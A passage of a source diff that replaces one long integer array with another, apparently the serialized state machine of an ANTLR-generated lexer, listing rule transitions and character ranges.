5, 6, 0, 5, 7, 0, 5, 8, 0, 5, 9, 0, 5, 10, 0, 5, 12, 0, 5, 13, 0, 5, 14, 0, 5, 15, 0, 7, 52, 0, 4, 0, 0, 7, 100, 0, 7, 74, 0, 7, 132, 0, 7, 64, 0, 7, 62, 0, 7, 102, 0, 7, 101, 0, 7, 97, 0, 5, 4, 0, 5, 3, 0, 7, 79, 0, 7, 38, 0, 7, 58, 0, 7, 128, 0, 7, 76, 0, 7, 95, 0, 7, 94, 0, 7, 96, 0, 7, 98, 0, 7, 61, 0, 7, 99, 0, 5, 0, 0, 7, 16, 0, 7, 60, 0, 7, 107, 0, 7, 53, 0, 5, 11, 0] \ No newline at end of file +[4, 0, 139, 1862, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 2, 0, 7, 0, 2, 1, 7, 1, 2, 2, 7, 2, 2, 3, 7, 3, 2, 4, 7, 4, 2, 5, 7, 5, 2, 6, 7, 6, 2, 7, 7, 7, 2, 8, 7, 8, 2, 9, 7, 9, 2, 10, 7, 10, 2, 11, 7, 11, 2, 12, 7, 12, 2, 13, 7, 13, 2, 14, 7, 14, 2, 15, 7, 15, 2, 16, 7, 16, 2, 17, 7, 17, 2, 18, 7, 18, 2, 19, 7, 19, 2, 20, 7, 20, 2, 21, 7, 21, 2, 22, 7, 22, 2, 23, 7, 23, 2, 24, 7, 24, 2, 25, 7, 25, 2, 26, 7, 26, 2, 27, 7, 27, 2, 28, 7, 28, 2, 29, 7, 29, 2, 30, 7, 30, 2, 31, 7, 31, 2, 32, 7, 32, 2, 33, 7, 33, 2, 34, 7, 34, 2, 35, 7, 35, 2, 36, 7, 36, 2, 37, 7, 37, 2, 38, 7, 38, 2, 39, 7, 39, 2, 40, 7, 40, 2, 41, 7, 41, 2, 42, 7, 42, 2, 43, 7, 43, 2, 44, 7, 44, 2, 45, 7, 45, 2, 46, 7, 46, 2, 47, 7, 47, 2, 48, 7, 48, 2, 49, 7, 49, 2, 50, 7, 50, 2, 51, 7, 51, 2, 52, 7, 52, 2, 53, 7, 53, 2, 54, 7, 54, 2, 55, 7, 55, 2, 56, 7, 56, 2, 57, 7, 57, 2, 58, 7, 58, 2, 59, 7, 59, 2, 60, 7, 60, 2, 61, 7, 61, 2, 62, 7, 62, 2, 63, 7, 63, 2, 64, 7, 64, 2, 65, 7, 65, 2, 66, 7, 66, 2, 67, 7, 67, 2, 68, 7, 68, 2, 69, 7, 69, 2, 70, 7, 70, 2, 71, 7, 71, 2, 72, 7, 72, 2, 73, 7, 73, 2, 74, 7, 74, 2, 75, 7, 75, 2, 76, 7, 76, 2, 77, 7, 77, 2, 78, 7, 78, 2, 79, 7, 79, 2, 80, 7, 80, 2, 81, 7, 81, 2, 82, 7, 82, 2, 83, 7, 83, 2, 84, 7, 84, 2, 85, 7, 85, 2, 86, 7, 86, 2, 87, 7, 87, 2, 88, 7, 88, 2, 89, 7, 89, 2, 90, 7, 90, 2, 91, 7, 91, 2, 92, 7, 92, 2, 93, 7, 93, 2, 94, 7, 94, 2, 95, 7, 95, 2, 96, 7, 96, 2, 97, 7, 97, 2, 98, 7, 98, 2, 99, 7, 99, 2, 100, 7, 100, 2, 101, 7, 101, 2, 102, 7, 102, 2, 103, 7, 103, 2, 104, 7, 104, 2, 105, 7, 105, 2, 106, 7, 106, 2, 107, 7, 107, 2, 108, 7, 108, 2, 109, 7, 109, 2, 110, 7, 110, 2, 111, 7, 111, 2, 112, 7, 112, 2, 113, 7, 113, 2, 114, 7, 114, 2, 115, 7, 115, 2, 116, 7, 116, 2, 117, 7, 117, 2, 118, 7, 118, 2, 119, 7, 119, 2, 120, 7, 120, 2, 121, 7, 121, 2, 122, 7, 122, 2, 123, 7, 123, 2, 124, 7, 124, 2, 125, 7, 125, 2, 126, 7, 126, 2, 127, 7, 127, 2, 128, 7, 128, 2, 129, 7, 129, 2, 130, 7, 130, 2, 131, 7, 131, 2, 132, 7, 132, 2, 133, 7, 133, 2, 134, 7, 134, 2, 135, 7, 135, 2, 136, 7, 136, 2, 137, 7, 137, 2, 138, 7, 138, 2, 139, 7, 139, 2, 140, 7, 140, 2, 141, 7, 141, 2, 142, 7, 142, 2, 143, 7, 143, 2, 144, 7, 144, 2, 145, 7, 145, 2, 146, 7, 146, 2, 147, 7, 147, 2, 148, 7, 148, 2, 149, 7, 149, 2, 150, 7, 150, 2, 151, 7, 151, 2, 152, 7, 152, 2, 153, 7, 153, 2, 154, 7, 154, 2, 155, 7, 155, 2, 156, 7, 156, 2, 157, 7, 157, 2, 158, 7, 158, 2, 159, 7, 159, 2, 160, 7, 160, 2, 161, 7, 161, 2, 162, 7, 162, 2, 163, 7, 163, 2, 164, 7, 164, 2, 165, 7, 165, 2, 166, 7, 166, 2, 167, 7, 167, 2, 168, 7, 168, 2, 169, 7, 169, 2, 170, 7, 170, 2, 171, 7, 171, 2, 172, 7, 172, 2, 173, 7, 173, 2, 174, 7, 174, 2, 175, 7, 175, 2, 176, 7, 176, 2, 177, 7, 177, 2, 178, 7, 178, 2, 179, 7, 179, 2, 180, 7, 180, 2, 181, 7, 181, 2, 182, 7, 182, 2, 183, 7, 183, 2, 184, 7, 184, 2, 185, 7, 185, 2, 186, 7, 186, 2, 187, 7, 187, 2, 188, 7, 188, 2, 189, 7, 189, 2, 190, 7, 190, 2, 191, 7, 191, 2, 192, 7, 192, 2, 193, 7, 193, 2, 194, 7, 194, 2, 195, 7, 195, 2, 196, 7, 196, 2, 197, 7, 197, 2, 198, 7, 198, 2, 199, 7, 199, 2, 200, 7, 200, 2, 201, 7, 201, 2, 202, 7, 202, 2, 203, 7, 203, 2, 204, 7, 204, 2, 205, 7, 205, 2, 206, 7, 206, 2, 207, 7, 207, 2, 208, 7, 208, 2, 209, 7, 209, 2, 210, 7, 210, 2, 211, 7, 211, 2, 212, 7, 212, 2, 213, 7, 213, 2, 214, 7, 214, 2, 215, 7, 215, 2, 216, 7, 216, 2, 217, 7, 217, 2, 218, 7, 218, 2, 219, 7, 219, 2, 220, 7, 220, 2, 221, 7, 221, 2, 222, 7, 222, 2, 223, 7, 223, 2, 224, 7, 224, 2, 225, 7, 225, 2, 226, 7, 226, 2, 227, 7, 227, 2, 228, 7, 228, 2, 229, 7, 229, 2, 230, 7, 230, 2, 231, 7, 231, 2, 232, 7, 232, 2, 233, 7, 233, 2, 234, 7, 234, 2, 235, 7, 235, 2, 236, 7, 236, 2, 237, 7, 237, 2, 238, 7, 238, 2, 239, 7, 239, 2, 240, 7, 240, 2, 241, 7, 241, 2, 242, 7, 242, 2, 243, 7, 243, 2, 244, 7, 244, 2, 245, 7, 245, 2, 246, 7, 246, 2, 247, 7, 247, 1, 0, 1, 0, 1, 0, 1, 0, 5, 0, 517, 8, 0, 10, 0, 12, 0, 520, 9, 0, 1, 0, 3, 0, 523, 8, 0, 1, 0, 3, 0, 526, 8, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 5, 1, 535, 8, 1, 10, 1, 12, 1, 538, 9, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 4, 2, 546, 8, 2, 11, 2, 12, 2, 547, 1, 2, 1, 2, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 8, 1, 8, 1, 8, 1, 8, 1, 8, 1, 8, 1, 8, 1, 9, 1, 9, 1, 9, 1, 9, 1, 9, 1, 9, 1, 9, 1, 10, 1, 10, 1, 10, 1, 10, 1, 10, 1, 10, 1, 10, 1, 10, 1, 11, 1, 11, 1, 11, 1, 11, 1, 11, 1, 11, 1, 12, 1, 12, 1, 12, 1, 12, 1, 12, 1, 12, 1, 12, 1, 12, 1, 12, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 1, 15, 1, 15, 1, 15, 1, 15, 1, 15, 1, 15, 1, 15, 1, 15, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 18, 1, 18, 1, 18, 1, 18, 1, 18, 1, 18, 1, 18, 1, 19, 1, 19, 1, 19, 1, 19, 1, 19, 1, 19, 1, 20, 1, 20, 1, 20, 1, 20, 1, 20, 1, 20, 1, 20, 1, 21, 1, 21, 1, 21, 1, 21, 1, 21, 1, 21, 1, 21, 1, 21, 1, 21, 1, 22, 1, 22, 1, 22, 1, 22, 1, 22, 1, 22, 1, 22, 1, 22, 1, 23, 1, 23, 1, 23, 1, 23, 1, 23, 1, 23, 1, 23, 1, 23, 1, 24, 1, 24, 1, 24, 1, 24, 1, 24, 1, 24, 1, 24, 1, 24, 1, 24, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 27, 1, 27, 1, 27, 1, 27, 1, 27, 1, 27, 1, 27, 1, 28, 1, 28, 1, 28, 1, 28, 1, 28, 1, 28, 1, 28, 1, 29, 1, 29, 1, 29, 1, 29, 1, 29, 1, 29, 1, 29, 1, 29, 1, 29, 1, 29, 1, 29, 1, 29, 1, 30, 1, 30, 1, 30, 1, 30, 1, 30, 1, 30, 1, 30, 1, 31, 1, 31, 1, 31, 1, 31, 1, 31, 1, 31, 1, 31, 1, 31, 1, 31, 1, 32, 1, 32, 1, 32, 1, 32, 1, 32, 1, 32, 1, 32, 1, 33, 4, 33, 823, 8, 33, 11, 33, 12, 33, 824, 1, 33, 1, 33, 1, 34, 1, 34, 1, 34, 1, 34, 1, 34, 1, 35, 1, 35, 1, 35, 1, 35, 1, 35, 1, 35, 1, 36, 1, 36, 1, 36, 1, 36, 1, 37, 1, 37, 1, 37, 1, 37, 1, 38, 1, 38, 1, 38, 1, 38, 1, 39, 1, 39, 1, 39, 1, 39, 1, 40, 1, 40, 1, 40, 1, 40, 1, 41, 1, 41, 1, 41, 1, 41, 1, 42, 1, 42, 1, 42, 1, 42, 1, 43, 1, 43, 1, 43, 1, 43, 1, 44, 1, 44, 1, 44, 1, 44, 1, 45, 1, 45, 1, 45, 1, 45, 1, 45, 1, 46, 1, 46, 1, 46, 1, 46, 1, 46, 1, 46, 1, 47, 1, 47, 1, 47, 1, 47, 1, 47, 1, 48, 1, 48, 1, 48, 1, 48, 1, 48, 1, 49, 1, 49, 1, 49, 1, 49, 1, 49, 1, 50, 1, 50, 1, 51, 4, 51, 905, 8, 51, 11, 51, 12, 51, 906, 1, 51, 1, 51, 3, 51, 911, 8, 51, 1, 51, 4, 51, 914, 8, 51, 11, 51, 12, 51, 915, 1, 52, 1, 52, 1, 52, 1, 52, 1, 53, 1, 53, 1, 53, 1, 53, 1, 54, 1, 54, 1, 54, 1, 54, 1, 55, 1, 55, 1, 55, 1, 55, 1, 56, 1, 56, 1, 56, 1, 56, 1, 57, 1, 57, 1, 57, 1, 57, 1, 57, 1, 57, 1, 58, 1, 58, 1, 58, 1, 58, 1, 58, 1, 58, 1, 58, 1, 59, 1, 59, 1, 59, 1, 59, 1, 60, 1, 60, 1, 60, 1, 60, 1, 61, 1, 61, 1, 61, 1, 61, 1, 62, 1, 62, 1, 62, 1, 62, 1, 63, 1, 63, 1, 63, 1, 63, 1, 64, 1, 64, 1, 64, 1, 64, 1, 65, 1, 65, 1, 65, 1, 65, 1, 66, 1, 66, 1, 66, 1, 66, 1, 67, 1, 67, 1, 67, 1, 67, 1, 68, 1, 68, 1, 68, 1, 68, 1, 69, 1, 69, 1, 69, 1, 69, 1, 70, 1, 70, 1, 70, 1, 70, 1, 71, 1, 71, 1, 71, 1, 71, 1, 72, 1, 72, 1, 72, 1, 72, 1, 72, 1, 73, 1, 73, 1, 73, 1, 73, 1, 74, 1, 74, 1, 74, 1, 74, 1, 74, 4, 74, 1017, 8, 74, 11, 74, 12, 74, 1018, 1, 75, 1, 75, 1, 75, 1, 75, 1, 76, 1, 76, 1, 76, 1, 76, 1, 77, 1, 77, 1, 77, 1, 77, 1, 78, 1, 78, 1, 78, 1, 78, 1, 78, 1, 79, 1, 79, 1, 79, 1, 79, 1, 79, 1, 80, 1, 80, 1, 80, 1, 80, 1, 81, 1, 81, 1, 81, 1, 81, 1, 82, 1, 82, 1, 82, 1, 82, 1, 83, 1, 83, 1, 83, 1, 83, 1, 84, 1, 84, 1, 85, 1, 85, 1, 86, 1, 86, 1, 86, 1, 87, 1, 87, 1, 88, 1, 88, 3, 88, 1070, 8, 88, 1, 88, 4, 88, 1073, 8, 88, 11, 88, 12, 88, 1074, 1, 89, 1, 89, 1, 90, 1, 90, 1, 91, 1, 91, 1, 91, 3, 91, 1084, 8, 91, 1, 92, 1, 92, 1, 93, 1, 93, 1, 93, 3, 93, 1091, 8, 93, 1, 94, 1, 94, 1, 94, 5, 94, 1096, 8, 94, 10, 94, 12, 94, 1099, 9, 94, 1, 94, 1, 94, 1, 94, 1, 94, 1, 94, 1, 94, 5, 94, 1107, 8, 94, 10, 94, 12, 94, 1110, 9, 94, 1, 94, 1, 94, 1, 94, 1, 94, 1, 94, 3, 94, 1117, 8, 94, 1, 94, 3, 94, 1120, 8, 94, 3, 94, 1122, 8, 94, 1, 95, 4, 95, 1125, 8, 95, 11, 95, 12, 95, 1126, 1, 96, 4, 96, 1130, 8, 96, 11, 96, 12, 96, 1131, 1, 96, 1, 96, 5, 96, 1136, 8, 96, 10, 96, 12, 96, 1139, 9, 96, 1, 96, 1, 96, 4, 96, 1143, 8, 96, 11, 96, 12, 96, 1144, 1, 96, 4, 96, 1148, 8, 96, 11, 96, 12, 96, 1149, 1, 96, 1, 96, 5, 96, 1154, 8, 96, 10, 96, 12, 96, 1157, 9, 96, 3, 96, 1159, 8, 96, 1, 96, 1, 96, 1, 96, 1, 96, 4, 96, 1165, 8, 96, 11, 96, 12, 96, 1166, 1, 96, 1, 96, 3, 96, 1171, 8, 96, 1, 97, 1, 97, 1, 97, 1, 97, 1, 98, 1, 98, 1, 98, 1, 98, 1, 99, 1, 99, 1, 100, 1, 100, 1, 100, 1, 101, 1, 101, 1, 101, 1, 102, 1, 102, 1, 103, 1, 103, 1, 104, 1, 104, 1, 104, 1, 104, 1, 104, 1, 105, 1, 105, 1, 106, 1, 106, 1, 106, 1, 106, 1, 106, 1, 106, 1, 107, 1, 107, 1, 107, 1, 107, 1, 107, 1, 107, 1, 108, 1, 108, 1, 108, 1, 109, 1, 109, 1, 109, 1, 110, 1, 110, 1, 110, 1, 110, 1, 110, 1, 111, 1, 111, 1, 111, 1, 111, 1, 111, 1, 112, 1, 112, 1, 112, 1, 112, 1, 113, 1, 113, 1, 113, 1, 113, 1, 113, 1, 114, 1, 114, 1, 114, 1, 114, 1, 114, 1, 114, 1, 115, 1, 115, 1, 115, 1, 116, 1, 116, 1, 116, 1, 117, 1, 117, 1, 118, 1, 118, 1, 118, 1, 118, 1, 118, 1, 118, 1, 119, 1, 119, 1, 119, 1, 119, 1, 119, 1, 120, 1, 120, 1, 120, 1, 120, 1, 120, 1, 121, 1, 121, 1, 121, 1, 122, 1, 122, 1, 122, 1, 123, 1, 123, 1, 123, 1, 124, 1, 124, 1, 125, 1, 125, 1, 125, 1, 126, 1, 126, 1, 127, 1, 127, 1, 127, 1, 128, 1, 128, 1, 129, 1, 129, 1, 130, 1, 130, 1, 131, 1, 131, 1, 132, 1, 132, 1, 133, 1, 133, 1, 134, 1, 134, 1, 135, 1, 135, 1, 135, 1, 136, 1, 136, 1, 136, 1, 136, 1, 137, 1, 137, 1, 137, 3, 137, 1310, 8, 137, 1, 137, 5, 137, 1313, 8, 137, 10, 137, 12, 137, 1316, 9, 137, 1, 137, 1, 137, 4, 137, 1320, 8, 137, 11, 137, 12, 137, 1321, 3, 137, 1324, 8, 137, 1, 138, 1, 138, 1, 138, 3, 138, 1329, 8, 138, 1, 138, 5, 138, 1332, 8, 138, 10, 138, 12, 138, 1335, 9, 138, 1, 138, 1, 138, 4, 138, 1339, 8, 138, 11, 138, 12, 138, 1340, 3, 138, 1343, 8, 138, 1, 139, 1, 139, 1, 139, 1, 139, 1, 139, 1, 140, 1, 140, 1, 140, 1, 140, 1, 140, 1, 141, 1, 141, 1, 141, 1, 141, 1, 141, 1, 142, 1, 142, 1, 142, 1, 142, 1, 142, 1, 143, 1, 143, 5, 143, 1367, 8, 143, 10, 143, 12, 143, 1370, 9, 143, 1, 143, 1, 143, 3, 143, 1374, 8, 143, 1, 143, 4, 143, 1377, 8, 143, 11, 143, 12, 143, 1378, 3, 143, 1381, 8, 143, 1, 144, 1, 144, 4, 144, 1385, 8, 144, 11, 144, 12, 144, 1386, 1, 144, 1, 144, 1, 145, 1, 145, 1, 146, 1, 146, 1, 146, 1, 146, 1, 147, 1, 147, 1, 147, 1, 147, 1, 148, 1, 148, 1, 148, 1, 148, 1, 149, 1, 149, 1, 149, 1, 149, 1, 149, 1, 150, 1, 150, 1, 150, 1, 150, 1, 151, 1, 151, 1, 151, 1, 151, 1, 152, 1, 152, 1, 152, 1, 152, 1, 153, 1, 153, 1, 153, 1, 153, 1, 154, 1, 154, 1, 154, 1, 154, 1, 155, 1, 155, 1, 155, 1, 155, 1, 156, 1, 156, 1, 156, 1, 156, 1, 156, 1, 156, 1, 156, 1, 156, 1, 156, 1, 157, 1, 157, 1, 157, 1, 157, 1, 157, 1, 158, 1, 158, 1, 158, 3, 158, 1451, 8, 158, 1, 159, 4, 159, 1454, 8, 159, 11, 159, 12, 159, 1455, 1, 160, 1, 160, 1, 160, 1, 160, 1, 161, 1, 161, 1, 161, 1, 161, 1, 162, 1, 162, 1, 162, 1, 162, 1, 163, 1, 163, 1, 163, 1, 163, 1, 164, 1, 164, 1, 164, 1, 164, 1, 165, 1, 165, 1, 165, 1, 165, 1, 165, 1, 166, 1, 166, 1, 166, 1, 166, 1, 166, 1, 166, 1, 167, 1, 167, 1, 167, 1, 167, 1, 167, 1, 168, 1, 168, 1, 168, 1, 168, 1, 169, 1, 169, 1, 169, 1, 169, 1, 170, 1, 170, 1, 170, 1, 170, 1, 171, 1, 171, 1, 171, 1, 171, 1, 171, 1, 172, 1, 172, 1, 172, 1, 172, 1, 172, 1, 173, 1, 173, 1, 173, 1, 173, 1, 174, 1, 174, 1, 174, 1, 174, 1, 174, 1, 174, 1, 175, 1, 175, 1, 175, 1, 175, 1, 175, 1, 175, 1, 175, 1, 175, 1, 175, 1, 176, 1, 176, 1, 176, 1, 176, 1, 177, 1, 177, 1, 177, 1, 177, 1, 178, 1, 178, 1, 178, 1, 178, 1, 179, 1, 179, 1, 179, 1, 179, 1, 180, 1, 180, 1, 180, 1, 180, 1, 181, 1, 181, 1, 181, 1, 181, 1, 182, 1, 182, 1, 182, 1, 182, 1, 183, 1, 183, 1, 183, 1, 183, 1, 184, 1, 184, 1, 184, 1, 184, 1, 184, 1, 185, 1, 185, 1, 185, 1, 185, 1, 185, 1, 185, 1, 186, 1, 186, 1, 186, 1, 186, 1, 187, 1, 187, 1, 187, 1, 187, 1, 188, 1, 188, 1, 188, 1, 188, 1, 189, 1, 189, 1, 189, 1, 189, 1, 189, 1, 190, 1, 190, 1, 190, 1, 190, 1, 191, 1, 191, 1, 191, 1, 191, 1, 192, 1, 192, 1, 192, 1, 192, 1, 193, 1, 193, 1, 193, 1, 193, 1, 194, 1, 194, 1, 194, 1, 194, 1, 195, 1, 195, 1, 195, 1, 195, 1, 195, 1, 195, 1, 196, 1, 196, 1, 196, 1, 196, 1, 196, 1, 196, 1, 196, 1, 197, 1, 197, 1, 197, 1, 197, 1, 198, 1, 198, 1, 198, 1, 198, 1, 199, 1, 199, 1, 199, 1, 199, 1, 200, 1, 200, 1, 200, 1, 200, 1, 201, 1, 201, 1, 201, 1, 201, 1, 202, 1, 202, 1, 202, 1, 202, 1, 203, 1, 203, 1, 203, 1, 203, 1, 203, 1, 204, 1, 204, 1, 204, 1, 204, 1, 204, 1, 204, 1, 205, 1, 205, 1, 205, 1, 205, 1, 206, 1, 206, 1, 206, 1, 206, 1, 207, 1, 207, 1, 207, 1, 207, 1, 208, 1, 208, 1, 208, 1, 208, 1, 209, 1, 209, 1, 209, 1, 209, 1, 210, 1, 210, 1, 210, 1, 210, 1, 211, 1, 211, 1, 211, 1, 211, 1, 212, 1, 212, 1, 212, 1, 212, 1, 213, 1, 213, 1, 213, 1, 213, 1, 214, 1, 214, 1, 214, 1, 214, 1, 215, 1, 215, 1, 215, 1, 215, 1, 215, 1, 216, 1, 216, 1, 216, 1, 216, 1, 216, 1, 216, 1, 217, 1, 217, 1, 217, 1, 217, 1, 218, 1, 218, 1, 218, 1, 218, 1, 219, 1, 219, 1, 219, 1, 219, 1, 220, 1, 220, 1, 220, 1, 220, 1, 221, 1, 221, 1, 221, 1, 221, 1, 222, 1, 222, 1, 222, 1, 222, 1, 223, 1, 223, 1, 223, 1, 223, 3, 223, 1742, 8, 223, 1, 224, 1, 224, 3, 224, 1746, 8, 224, 1, 224, 5, 224, 1749, 8, 224, 10, 224, 12, 224, 1752, 9, 224, 1, 224, 1, 224, 3, 224, 1756, 8, 224, 1, 224, 4, 224, 1759, 8, 224, 11, 224, 12, 224, 1760, 3, 224, 1763, 8, 224, 1, 225, 1, 225, 4, 225, 1767, 8, 225, 11, 225, 12, 225, 1768, 1, 226, 1, 226, 1, 226, 1, 226, 1, 227, 1, 227, 1, 227, 1, 227, 1, 228, 1, 228, 1, 228, 1, 228, 1, 229, 1, 229, 1, 229, 1, 229, 1, 229, 1, 230, 1, 230, 1, 230, 1, 230, 1, 230, 1, 230, 1, 231, 1, 231, 1, 231, 1, 231, 1, 232, 1, 232, 1, 232, 1, 232, 1, 233, 1, 233, 1, 233, 1, 233, 1, 234, 1, 234, 1, 234, 1, 234, 1, 235, 1, 235, 1, 235, 1, 235, 1, 236, 1, 236, 1, 236, 1, 236, 1, 237, 1, 237, 1, 237, 1, 237, 1, 238, 1, 238, 1, 238, 1, 239, 1, 239, 1, 239, 1, 239, 1, 240, 1, 240, 1, 240, 1, 240, 1, 241, 1, 241, 1, 241, 1, 241, 1, 242, 1, 242, 1, 242, 1, 242, 1, 243, 1, 243, 1, 243, 1, 243, 1, 243, 1, 244, 1, 244, 1, 244, 1, 244, 1, 244, 1, 245, 1, 245, 1, 245, 1, 245, 1, 246, 1, 246, 1, 246, 1, 246, 1, 247, 1, 247, 1, 247, 1, 247, 2, 536, 1108, 0, 248, 16, 1, 18, 2, 20, 3, 22, 4, 24, 5, 26, 6, 28, 7, 30, 8, 32, 9, 34, 10, 36, 11, 38, 12, 40, 13, 42, 14, 44, 15, 46, 16, 48, 17, 50, 18, 52, 19, 54, 20, 56, 21, 58, 22, 60, 23, 62, 24, 64, 25, 66, 26, 68, 27, 70, 28, 72, 29, 74, 30, 76, 31, 78, 32, 80, 33, 82, 34, 84, 0, 86, 0, 88, 0, 90, 0, 92, 0, 94, 0, 96, 0, 98, 0, 100, 35, 102, 36, 104, 37, 106, 0, 108, 0, 110, 0, 112, 0, 114, 0, 116, 0, 118, 38, 120, 0, 122, 0, 124, 39, 126, 40, 128, 41, 130, 0, 132, 0, 134, 0, 136, 0, 138, 0, 140, 0, 142, 0, 144, 0, 146, 0, 148, 0, 150, 0, 152, 0, 154, 42, 156, 43, 158, 44, 160, 0, 162, 0, 164, 45, 166, 46, 168, 47, 170, 48, 172, 0, 174, 0, 176, 49, 178, 50, 180, 51, 182, 52, 184, 0, 186, 0, 188, 0, 190, 0, 192, 0, 194, 0, 196, 0, 198, 0, 200, 0, 202, 0, 204, 53, 206, 54, 208, 55, 210, 56, 212, 57, 214, 58, 216, 59, 218, 60, 220, 61, 222, 62, 224, 63, 226, 64, 228, 65, 230, 66, 232, 67, 234, 68, 236, 69, 238, 70, 240, 71, 242, 72, 244, 73, 246, 74, 248, 75, 250, 76, 252, 77, 254, 78, 256, 79, 258, 80, 260, 81, 262, 82, 264, 83, 266, 84, 268, 85, 270, 86, 272, 87, 274, 88, 276, 89, 278, 90, 280, 91, 282, 92, 284, 93, 286, 94, 288, 0, 290, 95, 292, 96, 294, 97, 296, 98, 298, 99, 300, 100, 302, 101, 304, 0, 306, 102, 308, 103, 310, 104, 312, 105, 314, 0, 316, 0, 318, 0, 320, 0, 322, 0, 324, 0, 326, 0, 328, 106, 330, 0, 332, 0, 334, 107, 336, 0, 338, 0, 340, 108, 342, 109, 344, 110, 346, 0, 348, 0, 350, 0, 352, 111, 354, 112, 356, 113, 358, 0, 360, 114, 362, 0, 364, 0, 366, 115, 368, 0, 370, 0, 372, 0, 374, 0, 376, 0, 378, 116, 380, 117, 382, 118, 384, 0, 386, 0, 388, 0, 390, 0, 392, 0, 394, 0, 396, 0, 398, 0, 400, 119, 402, 120, 404, 121, 406, 0, 408, 0, 410, 0, 412, 0, 414, 0, 416, 122, 418, 123, 420, 124, 422, 0, 424, 0, 426, 0, 428, 0, 430, 0, 432, 0, 434, 0, 436, 0, 438, 0, 440, 125, 442, 126, 444, 127, 446, 0, 448, 0, 450, 0, 452, 0, 454, 0, 456, 0, 458, 0, 460, 0, 462, 0, 464, 0, 466, 128, 468, 129, 470, 130, 472, 131, 474, 0, 476, 0, 478, 0, 480, 0, 482, 0, 484, 0, 486, 0, 488, 0, 490, 0, 492, 132, 494, 0, 496, 133, 498, 134, 500, 135, 502, 0, 504, 136, 506, 137, 508, 138, 510, 139, 16, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 36, 2, 0, 10, 10, 13, 13, 3, 0, 9, 10, 13, 13, 32, 32, 2, 0, 67, 67, 99, 99, 2, 0, 72, 72, 104, 104, 2, 0, 65, 65, 97, 97, 2, 0, 78, 78, 110, 110, 2, 0, 71, 71, 103, 103, 2, 0, 69, 69, 101, 101, 2, 0, 80, 80, 112, 112, 2, 0, 79, 79, 111, 111, 2, 0, 73, 73, 105, 105, 2, 0, 84, 84, 116, 116, 2, 0, 82, 82, 114, 114, 2, 0, 88, 88, 120, 120, 2, 0, 76, 76, 108, 108, 2, 0, 77, 77, 109, 109, 2, 0, 68, 68, 100, 100, 2, 0, 83, 83, 115, 115, 2, 0, 86, 86, 118, 118, 2, 0, 75, 75, 107, 107, 2, 0, 87, 87, 119, 119, 2, 0, 70, 70, 102, 102, 2, 0, 85, 85, 117, 117, 6, 0, 9, 10, 13, 13, 32, 32, 47, 47, 91, 91, 93, 93, 12, 0, 9, 10, 13, 13, 32, 32, 34, 35, 40, 41, 44, 44, 47, 47, 58, 58, 60, 60, 62, 63, 92, 92, 124, 124, 1, 0, 48, 57, 2, 0, 65, 90, 97, 122, 8, 0, 34, 34, 78, 78, 82, 82, 84, 84, 92, 92, 110, 110, 114, 114, 116, 116, 4, 0, 10, 10, 13, 13, 34, 34, 92, 92, 2, 0, 43, 43, 45, 45, 1, 0, 96, 96, 2, 0, 66, 66, 98, 98, 2, 0, 89, 89, 121, 121, 12, 0, 9, 10, 13, 13, 32, 32, 34, 34, 40, 41, 44, 44, 47, 47, 58, 58, 61, 61, 91, 91, 93, 93, 124, 124, 2, 0, 42, 42, 47, 47, 2, 0, 74, 74, 106, 106, 1893, 0, 16, 1, 0, 0, 0, 0, 18, 1, 0, 0, 0, 0, 20, 1, 0, 0, 0, 0, 22, 1, 0, 0, 0, 0, 24, 1, 0, 0, 0, 0, 26, 1, 0, 0, 0, 0, 28, 1, 0, 0, 0, 0, 30, 1, 0, 0, 0, 0, 32, 1, 0, 0, 0, 0, 34, 1, 0, 0, 0, 0, 36, 1, 0, 0, 0, 0, 38, 1, 0, 0, 0, 0, 40, 1, 0, 0, 0, 0, 42, 1, 0, 0, 0, 0, 44, 1, 0, 0, 0, 0, 46, 1, 0, 0, 0, 0, 48, 1, 0, 0, 0, 0, 50, 1, 0, 0, 0, 0, 52, 1, 0, 0, 0, 0, 54, 1, 0, 0, 0, 0, 56, 1, 0, 0, 0, 0, 58, 1, 0, 0, 0, 0, 60, 1, 0, 0, 0, 0, 62, 1, 0, 0, 0, 0, 64, 1, 0, 0, 0, 0, 66, 1, 0, 0, 0, 0, 68, 1, 0, 0, 0, 0, 70, 1, 0, 0, 0, 0, 72, 1, 0, 0, 0, 0, 74, 1, 0, 0, 0, 0, 76, 1, 0, 0, 0, 0, 78, 1, 0, 0, 0, 0, 80, 1, 0, 0, 0, 0, 82, 1, 0, 0, 0, 1, 84, 1, 0, 0, 0, 1, 86, 1, 0, 0, 0, 1, 88, 1, 0, 0, 0, 1, 90, 1, 0, 0, 0, 1, 92, 1, 0, 0, 0, 1, 94, 1, 0, 0, 0, 1, 96, 1, 0, 0, 0, 1, 98, 1, 0, 0, 0, 1, 100, 1, 0, 